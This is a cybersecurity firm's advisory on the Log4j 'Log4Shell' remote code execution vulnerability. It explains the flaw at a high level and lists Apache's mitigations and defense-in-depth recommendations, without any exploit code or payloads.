Follow ISA Cybersecurity on LinkedIn for the latest cybersecurity news
Weekly CyberTip: What is an SBOM?
The emerging Apache Log4j vulnerability crisis underscores the importance of “software bills of materials” or SBOMs. An SBOM is a formal record containing all the details and third-party relationships of various components used in software. Having an SBOM for software used in your enterprise can give you instant visibility into potential risk when an application vulnerability is announced.
Critical Apache Log4j software vulnerability has global impacts
The cyber world is reeling from one of the most significant software vulnerabilities in years. Today’s CyberNews focuses on the Apache Log4j or “Log4Shell” vulnerability recently identified in the wild.
What happened with Apache Log4j software?
On Thursday, December 9, a proof-of-concept was published that demonstrated an exploit of a “remote code execution” (RCE) bug in Apache Log4j, world’s most widely-used Java logging library. The vulnerability – which has been assigned CVE tracking code CVE-2021-44228 – has been given the highest possible severity rating of 10, given its ubiquity and ease of compromise. Log4j is used in countless systems around the world, including those from Microsoft, Amazon, Twitter, Apple iCloud, Cisco, Cloudflare, and more. GitHub has a dynamic list of affected applications and services that is growing by the hour.
Apache’s description of the vulnerability reveals that “JNDI [Java Naming and Directory Interface] features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.” This “arbitrary code” could include instructions to download and execute malicious payloads on targeted systems.
Threat actors are conducting widespread scanning across the Internet looking for potential targets for compromise. The first major reported infection involved the popular online game Minecraft. Most successful breaches to date have resulted in threat actors deploying crypto-mining operations on compromised systems, but there is little doubt that greater damage could be done by determined criminal enterprise. Some organizations like GO Transit and the Canada Revenue Agency pre-emptively disabled their websites over the weekend in order to prevent attack while they investigated potential exposure.
What recommendations does ISA Cybersecurity have for me?
Apache has released a fix for the vulnerability; we recommend that organizations evaluate and implement upgrades featuring the latest version of Apache Log4j – version 2.15.0-rc2 – for all affected systems (note that the original patch “rc1” was found to be inadequate in completely fixing the vulnerability).
However, given the number of instances of use of the utility – either directly, or embedded in services or applications – patching may be difficult and time-consuming. Apache has issued guidance on mitigation strategies to be taken if immediate patching is unfeasible:
• In releases 2.10 or later, this behavior can be mitigated by setting either the system property “log4j2.formatMsgNoLookups” or the environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” to true.
• For releases from 2.7 to 2.14.1 inclusive, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m.
• For releases from 2.0-beta9 to 2.10.0 inclusive, the mitigation is to remove the JndiLookup class from the classpath.
ISA Cybersecurity also recommends a defense-in-depth strategy to protect your systems while you deploy patches to affected systems. This should start with the following actions:
• Ensure that your firewall signatures are up to date and set to block any scanning attempt from potential threat actors;
• Ensure that your endpoint protection tools are up to date and set to block/remove malicious detections like crypto miners and other malware; and
• Ensure that all Internet-facing applications and services are logging with your internal IT team or SIEM to help monitor for anomalous behaviours.
Many cybersecurity vendors are providing specific guidance to help mitigate the risks using their products. For example:
• McAfee has provided a summary of its own analysis of its products, in addition to updating defenses for its endpoint security, virus scanning, and web gateway products;
• Check Point has updated protections to its Quantum firewall products to detect and filter attacks;
• Tenable has released updated scan templates and plug-ins to protect their clients;
• Palo Alto Networks has issued analysis, guidance, and updated protections;
• Cloudflare is introducing filtering to block attempted exploits; and
• Microsoft has published guidance for preventing, detecting, and hunting Log4j-related attacks.
The governments of Canada (via the CCCS) and the United States (via CISA) have also issued official alerts regarding the vulnerability.
Further questions?
ISA Cybersecurity will continue to monitor the situation, keeping abreast of the rapidly evolving indicators of attack exploiting this vulnerability, as well as any updates from Apache and our extensive cybersecurity ecosystem. We will advise our customers of any relevant updates as they become available.
If you have further questions, or require immediate assistance or guidance in assessing your exposure, please do not hesitate to contact us to discuss any concerns. We are here to help.